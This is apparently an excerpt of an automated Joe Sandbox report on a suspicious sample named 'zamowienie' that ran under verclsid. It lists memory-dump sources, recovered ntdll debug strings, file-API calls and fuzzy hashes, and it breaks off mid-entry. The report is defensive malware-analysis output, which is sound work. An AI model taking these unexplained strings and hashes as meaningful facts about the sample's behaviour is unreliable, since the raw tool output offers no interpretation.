                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: $$@
                                                                                                                                              • API String ID: 3446177414-1194432280
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • LdrpFindDllActivationContext, xrefs: 34F63636, 34F63662
                                                                                                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 34F63640, 34F6366C
                                                                                                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 34F6365C
                                                                                                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 34F6362F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                              • API String ID: 3446177414-3779518884
                                                                                                                                              Strings
                                                                                                                                              • TG4, xrefs: 34F12462
                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 34F5A9A2
                                                                                                                                              • LdrpDynamicShimModule, xrefs: 34F5A998
                                                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 34F5A992
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG4$minkernel\ntdll\ldrinit.c
                                                                                                                                              • API String ID: 0-3886369598
                                                                                                                                              • Opcode ID: 0dee9ef1e897a82d850f44029f5da770a2c74eb86561b20ed18e907886abe54e
                                                                                                                                              • Instruction ID: a4522dd4094255a55c350fac320c8e875eb2b0560700f4bd524c8a6c1a6cdcc0
                                                                                                                                              • Opcode Fuzzy Hash: 0dee9ef1e897a82d850f44029f5da770a2c74eb86561b20ed18e907886abe54e
                                                                                                                                              • Instruction Fuzzy Hash: 1F314876A10305EFE7109F99D884EAA77B4FB84754F5E09A9E800B7261C77099D3CBC1
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                                              • Opcode ID: e7ceff78a24a96160dca3322b05d84c9b2ea610e48aaa7b949563040c7a8954f
                                                                                                                                              • Instruction ID: ef67ff5d474812ac81374e221fdead3d64bf84298bae1e45d43fd8523a92d280
                                                                                                                                              • Opcode Fuzzy Hash: e7ceff78a24a96160dca3322b05d84c9b2ea610e48aaa7b949563040c7a8954f
                                                                                                                                              • Instruction Fuzzy Hash: 122135BAA01119AFD710DFB9DC44AEE7BF8EF54684F49051AE905E3300EB34D9128FA1
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                              • API String ID: 3446177414-3610490719
                                                                                                                                              • Opcode ID: b7b51698e7649b6f9cf10e3b1dc7ea0e23ce50cf98003e3170d9ae9e1fed95e0
                                                                                                                                              • Instruction ID: 9dddd3a6eec867942c6253636e744642caa6e6aa3b290fc5d2625a3760c52e9a
                                                                                                                                              • Opcode Fuzzy Hash: b7b51698e7649b6f9cf10e3b1dc7ea0e23ce50cf98003e3170d9ae9e1fed95e0
                                                                                                                                              • Instruction Fuzzy Hash: 6091F575715741EFF715CF24C880B7ABBA9BF84698F084859E9849B381DF34E882CB91
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 34F5A121
                                                                                                                                              • LdrpCheckModule, xrefs: 34F5A117
                                                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 34F5A10F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                              • API String ID: 3446177414-161242083
                                                                                                                                              • Opcode ID: 8dea68fa2e2e52d801763b52e2cea594f3cb6c211c18209117cd6d14188429ae
                                                                                                                                              • Instruction ID: 7a3207a365f7e0ae08ba0b2fc63ce87c0b37087da188c3583d4b8f95e39962e1
                                                                                                                                              • Opcode Fuzzy Hash: 8dea68fa2e2e52d801763b52e2cea594f3cb6c211c18209117cd6d14188429ae
                                                                                                                                              • Instruction Fuzzy Hash: 6271AD75A10209DFEB04DF69C980AAEB7F5EB44204F5D486DE801E7660E734AA83CF94
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: $File
                                                                                                                                              • API String ID: 3446177414-2412145507
                                                                                                                                              • Opcode ID: 3a8ff70a646868e738f2c78da9306a0a05dee07b73dd9676b5eef3de60ffc96e
                                                                                                                                              • Instruction ID: 1831db2652e0963ac019d5efa130290cf3951e0eaa6c2c8411f146cfd1301e64
                                                                                                                                              • Opcode Fuzzy Hash: 3a8ff70a646868e738f2c78da9306a0a05dee07b73dd9676b5eef3de60ffc96e
                                                                                                                                              • Instruction Fuzzy Hash: F161AE71A1021DAFEB268F24CC41BE9B7B8AF48711F4849EDE509E6191DB709F85CF50
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                              • API String ID: 3446177414-2283098728
                                                                                                                                              • Opcode ID: 68b008bb11086a15e9963b8a0bf661086e4f39d091fa035b481eedad6df4b4f9
                                                                                                                                              • Instruction ID: cd1ccbd27472d1ba4b070137cfaf10c803b6596e51dde0f7425d9b874d8827a8
                                                                                                                                              • Opcode Fuzzy Hash: 68b008bb11086a15e9963b8a0bf661086e4f39d091fa035b481eedad6df4b4f9
                                                                                                                                              • Instruction Fuzzy Hash: 19519F75704702DFE715DF24C884E2AB7A5BB84224F8C4E6DE4969B291DB30A847CFD1
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 34F682D7
                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 34F682E8
                                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 34F682DE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                              • API String ID: 3446177414-1783798831
                                                                                                                                              • Opcode ID: c8f2b3a0f1371067da2179eebdc60f9b70e741697d72df0a9c5895332a767acf
                                                                                                                                              • Instruction ID: 6fd1fbf4cfe273a25d3ea14d18092c54b6a5e87127147025f0eb761cd97cffdc
                                                                                                                                              • Opcode Fuzzy Hash: c8f2b3a0f1371067da2179eebdc60f9b70e741697d72df0a9c5895332a767acf
                                                                                                                                              • Instruction Fuzzy Hash: 1041F0BA521304EFE720DB64D840B5B77E8EF49750F484D2AF884E7290E775D8428B95
                                                                                                                                              Strings
                                                                                                                                              • RTL: Re-Waiting, xrefs: 34F67BAC
                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 34F67B7F
                                                                                                                                              • RTL: Resource at %p, xrefs: 34F67B8E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                              • API String ID: 0-871070163
                                                                                                                                              • Opcode ID: f7d5af85e40d5c5b4aa8c8017db98b6b0330f4051b886be0655a929084604b95
                                                                                                                                              • Instruction ID: d0441919621a12c50e0d04ea9ae8ba6cf65be59ab13d110b208a4a8657dbf5b5
                                                                                                                                              • Opcode Fuzzy Hash: f7d5af85e40d5c5b4aa8c8017db98b6b0330f4051b886be0655a929084604b95
                                                                                                                                              • Instruction Fuzzy Hash: DE41D0397057029FE714CE25C940B5AB7E9FF88721F180E1DE95A9B680DB31E8078F91
                                                                                                                                              APIs
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 34F6728C
                                                                                                                                              Strings
                                                                                                                                              • RTL: Re-Waiting, xrefs: 34F672C1
                                                                                                                                              • RTL: Resource at %p, xrefs: 34F672A3
                                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 34F67294
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 34F74899
                                                                                                                                              • LdrpCheckRedirection, xrefs: 34F7488F
                                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 34F74888
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                              • API String ID: 3446177414-3154609507
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: Wow64 Emulation Layer
                                                                                                                                              • API String ID: 3446177414-921169906
                                                                                                                                              APIs
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              APIs
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              APIs
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              APIs
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              APIs
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4281723722-0
                                                                                                                                              • Opcode ID: 851d25281fb580f4b31c8b5aef913d091511a7231bac11a9bd3963f2c284ee6d
                                                                                                                                              • Instruction ID: 67ef027a67a651e8f9412c022395a67e1e46d181da8135d0713542d03f3c354e
                                                                                                                                              • Opcode Fuzzy Hash: 851d25281fb580f4b31c8b5aef913d091511a7231bac11a9bd3963f2c284ee6d
                                                                                                                                              • Instruction Fuzzy Hash: C7314675E10628EFDF00DFA8D844A9DBBB0FB48721F18452AE411B7290CB359942CF98
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                              • Opcode ID: 3178185268dd22099613e0e3212c43f1badede4e290e49bf07e11ec524ce8b69
                                                                                                                                              • Instruction ID: 47e10fa1f30177af98728c233f7330955cee6d90f1938bb1e0579690c9e396f9
                                                                                                                                              • Opcode Fuzzy Hash: 3178185268dd22099613e0e3212c43f1badede4e290e49bf07e11ec524ce8b69
                                                                                                                                              • Instruction Fuzzy Hash: 79326670E00369DFEB21CF64CC84BD9BBB4BB08304F0584E9D458A7252EB769A85CF91
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                              • String ID: +$-
                                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                              • Instruction ID: 33fd02e2fc6bc2b10f7e6e47faeb597e3b73417d8ce1dc28dd215f0903d0e8b5
                                                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                              • Instruction Fuzzy Hash: 1C91A8B5E022159FEB10CF65C8806AEB7E5BF44760F58CD1AF855E72C0D73499828F60
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0$Flst
                                                                                                                                              • API String ID: 0-758220159
                                                                                                                                              • Opcode ID: 016134a757342aae64b94180360ca8505920cf9914e97f9f9c2c5bfd4a6deed2
                                                                                                                                              • Instruction ID: 6604d1d48c26deb9a7411083f2f27e9adaad3f589319b2e55d562c8ece482468
                                                                                                                                              • Opcode Fuzzy Hash: 016134a757342aae64b94180360ca8505920cf9914e97f9f9c2c5bfd4a6deed2
                                                                                                                                              • Instruction Fuzzy Hash: 3351C1B9E00A15DFEB14CF98C48465DFBF5EF44798F58882ED0499B250EBB09986CB80
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 34EF063D
                                                                                                                                              • kLsE, xrefs: 34EF0540
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                              • API String ID: 3446177414-2547482624
                                                                                                                                              • Opcode ID: 8a4b6f4a8f97ef855f988218a38adffa8250c233ebf500b14fa3caceaf5173d9
                                                                                                                                              • Instruction ID: 0e0322423404b5e895442c5d4cb7c89b7762ba79327d54af293ad923e5f32482
                                                                                                                                              • Opcode Fuzzy Hash: 8a4b6f4a8f97ef855f988218a38adffa8250c233ebf500b14fa3caceaf5173d9
                                                                                                                                              • Instruction Fuzzy Hash: 6C51CEB5514742CFD324DF64C9406A3B7E4AF8930AF028C3EE9A997640E772E545CF92
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: 0$0
                                                                                                                                              • API String ID: 3446177414-203156872
                                                                                                                                              • Opcode ID: 7e1fffc817553348221d59dc80f50550b0157faf5e303606452b264375381d18
                                                                                                                                              • Instruction ID: 6372b13b8db00026ae18397e7a67cc917eb69776bee5b4e4936de88cfb0ffebf
                                                                                                                                              • Opcode Fuzzy Hash: 7e1fffc817553348221d59dc80f50550b0157faf5e303606452b264375381d18
                                                                                                                                              • Instruction Fuzzy Hash: 41415BB56087069FD300CF68C584A1ABBE9BF88358F04492EF888DB341D771E946CF96

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:2.5%
                                                                                                                                              Dynamic/Decrypted Code Coverage:4.2%
                                                                                                                                              Signature Coverage:0.7%
                                                                                                                                              Total number of Nodes:455
                                                                                                                                              Total number of Limit Nodes:75

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: #I$'O$(e$2Z$9$>t$?$G$NK$R=$Um$W#$\$f$o}$u$yB$z"$5$:$|
                                                                                                                                              • API String ID: 0-534497107
                                                                                                                                              • Opcode ID: d49beeff9db1f877f84ae066d67ef71df962edb1cf7f168b5fa97273dcc1d206
                                                                                                                                              • Instruction ID: 7d807a9539888998b2ba1ea91855e174dfccf1ccda49862b273ec1acb24bd04f
                                                                                                                                              • Opcode Fuzzy Hash: d49beeff9db1f877f84ae066d67ef71df962edb1cf7f168b5fa97273dcc1d206
                                                                                                                                              • Instruction Fuzzy Hash: 1CE1A2B0D45229CFEB24CF94C894BEDBBB2BB44308F2091A9D4096B381D7B56A85CF55
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 02EBC544
                                                                                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 02EBC57F
                                                                                                                                              • FindClose.KERNELBASE(?), ref: 02EBC58A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3541575487-0
                                                                                                                                              • Opcode ID: 25d8c32ac73351282a7df8be7540f7ff9f3507150f35722bbf60f4774898870c
                                                                                                                                              • Instruction ID: 92c83fb83d2d4af232016296f8097b11ceb666a928a8c7247dc1a0c6466b3845
                                                                                                                                              • Opcode Fuzzy Hash: 25d8c32ac73351282a7df8be7540f7ff9f3507150f35722bbf60f4774898870c
                                                                                                                                              • Instruction Fuzzy Hash: E73187719403087FDB21DFA4CD85FEB77BDEF44748F249459B909AA180DB70AA858BA0
                                                                                                                                              APIs
                                                                                                                                              • NtCreateFile.NTDLL(EA1C6576,?,?,?,?,?,?,?,?,?,?), ref: 02EC907E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                              • Opcode ID: d9774e6064a96e333b566dc55169cafcbbb4701f5fb4a2273effae9a8f3b038f
                                                                                                                                              • Instruction ID: 94ad65029a5f0531445eb344f8d113a26fbc8594ff1d90cdd8bc7c4f949229e6
                                                                                                                                              • Opcode Fuzzy Hash: d9774e6064a96e333b566dc55169cafcbbb4701f5fb4a2273effae9a8f3b038f
                                                                                                                                              • Instruction Fuzzy Hash: F731C2B5A00248AFDB14DF98D881EEEB7B9AF88314F108219F919A7344D734A911CFA4
                                                                                                                                              APIs
                                                                                                                                              • NtReadFile.NTDLL(EA1C6576,?,?,?,?,?,?,?,?), ref: 02EC91D9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
